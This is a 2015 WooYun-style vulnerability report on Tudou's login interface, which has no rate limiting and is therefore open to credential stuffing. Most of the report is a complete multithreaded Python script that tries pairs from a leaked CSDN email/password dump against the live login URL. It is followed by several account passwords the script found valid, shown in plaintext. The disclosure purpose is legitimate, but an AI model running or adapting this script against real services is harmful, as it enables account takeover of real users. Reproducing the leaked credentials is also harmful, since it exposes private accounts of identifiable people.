乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-23: 细节已通知厂商并且等待厂商处理中 2015-06-23: 厂商已经确认,细节仅向厂商公开 2015-07-03: 细节向核心白帽子及相关领域专家公开 2015-07-13: 细节向普通白帽子公开 2015-07-23: 细节向实习白帽子公开 2015-08-07: 细节向公众公开
rt
接口:
http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname=test&passwd=test&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212'
对loginame和passwd进行爆破,没有限制,但是当重复提交次数超过500以上(具体多少没测试)会将IP地址进行限制。但是过一段时间又会解除限制。python fuzz代码:
#!/usr/bin/env python#-*-coding:utf-8-*-import httplib2import urllib2import urllibimport socketimport socksfrom urllib import urlopenfrom string import replace,find,lowerfrom httplib import HTTPExceptionfrom urllib import urlencodeimport timeimport threadpoolimport threadingimport pdbimport traceback pdb.set_trace()mutex = threading.Lock()class fuzz(object): def __init__(self,user_pwd,count): self.user_pwd = user_pwd self.good = [] self.count = count self.threadnum = 10 def makePackage(self,euser,epwd): url = 'http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname='+euser+'&passwd='+epwd+'&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212' headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'} h = httplib2.Http() try: res,con = h.request(url) except Exception,ex: print Exception,":",ex traceback.print_exc() return i = con.find('success') t = [] if i != -1: if mutex.acquire(): self.good.append([euser,epwd]) print euser+':'+epwd+'\n' mutex.release() else: pass def preS(self): base = 0 for each in self.user_pwd: self.makePackage(each[0],each[1][0:-1]) if mutex.acquire(): if len(self.good) != base: self.save() base = len(self.good) mutex.release() def save(self): fp = open('result','w') for each in self.good: fp.writelines(each[0]+' '+each[1]+'\n') fp.close() def gothread(self): #建立进程池 pool = threadpool.ThreadPool(self.threadnum) #两个list合并,直接相加就可以 count = 0 base = 0 for i in range(self.count): print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n' if mutex.acquire(): if len(self.good) != base: self.save() print 'OK\n' base = len(self.good) mutex.release() pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1]) #join and destroy all threads pool.destroy() if __name__=='__main__': f = open('csdn_email','r') up = [] count = 0 while True: line = f.readline() if line: i = line.find(' ') user = line[0:i] pwd = line[i+1:] up.append([user,pwd]) count = count + 1 else: break f.close() test = fuzz(up,count) test.preS()
因为只测试一次,用csdn邮箱以及密码进行测试。经过一轮测试得到的有效的用户密码:[email protected] 730413[email protected] jamstang[email protected] Swhy920520[email protected] my1316pass[email protected] xinghong
防撞库
危害等级:中
漏洞Rank:6
确认时间:2015-06-23 18:40
已知问题,多谢。
暂无